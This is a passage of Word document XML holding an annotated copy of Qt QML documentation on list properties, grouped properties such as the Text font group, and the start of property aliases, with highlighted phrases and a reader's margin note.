      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;,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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">item </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;,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For </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2737" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2738" w:anchor="states-prop" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>states</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property that is used to hold a list of</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2739" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>State</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type objects. The code below initializes the value of this property to a list of three</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2740" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>State</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects: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lastRenderedPageBreak/>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Item</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states</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State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name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"loading"</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State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name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"running"</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State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name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"stopped"</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If the list contains a single item, the square brackets may be omitted:</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Item</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states</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State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name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"running"</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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2741" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>list</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type property may be specified in an object declaration with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default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list</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objectType</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> propertyName</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and, like other property declarations, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property initialization may be combined with the property declaration</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default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list</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objectType</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> propertyName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&lt;value&gt;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An example of list property declaration follows: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 declaration without initialization</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list</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w: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un"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> siblingRects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 declaration with initialization</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list</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w: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un"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> childRects</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"red"</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"blue"</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80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you wish to declare a property to store a list of values which are not necessarily QML object-type values, you should declare a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2742" w:history="1">
        <w:r w:rsidRPr="00E80CEE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>var</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2494" w:name="_Toc483001073"/>
      <w:bookmarkStart w:id="2495" w:name="_Toc483604408"/>
      <w:bookmarkStart w:id="2496" w:name="_Toc483605628"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Grouped Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2494"/>
      <w:bookmarkEnd w:id="2495"/>
      <w:bookmarkEnd w:id="2496"/>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In some cases </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties contain a logical group of sub-property attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These sub-property attributes can be assigned to using either the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dot notation or group notation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2743" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2744" w:anchor="font.family-prop" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>font</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>group property. Below, the first</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2745" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object initializes its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font</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values using dot notation, while the second uses group notation:</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Text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//dot notation</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font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pixelSize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12</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font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b</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true</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Text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//group notation</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font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pixelSize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12</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b</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true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80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Grouped property types are basic types which have subproperties</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some of these basic types are provided by the QML language, while others may only be used if the Qt Quick module is imported</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2746" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Basic Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27" w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>how to create group properties from C++</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2497" w:name="property-aliases"/>
      <w:bookmarkStart w:id="2498" w:name="_Toc483001074"/>
      <w:bookmarkStart w:id="2499" w:name="_Toc483604409"/>
      <w:bookmarkStart w:id="2500" w:name="_Toc483605629"/>
      <w:bookmarkEnd w:id="2497"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Aliases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2498"/>
      <w:bookmarkEnd w:id="2499"/>
      <w:bookmarkEnd w:id="2500"/>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Property aliases are </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties which hold a reference to another property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
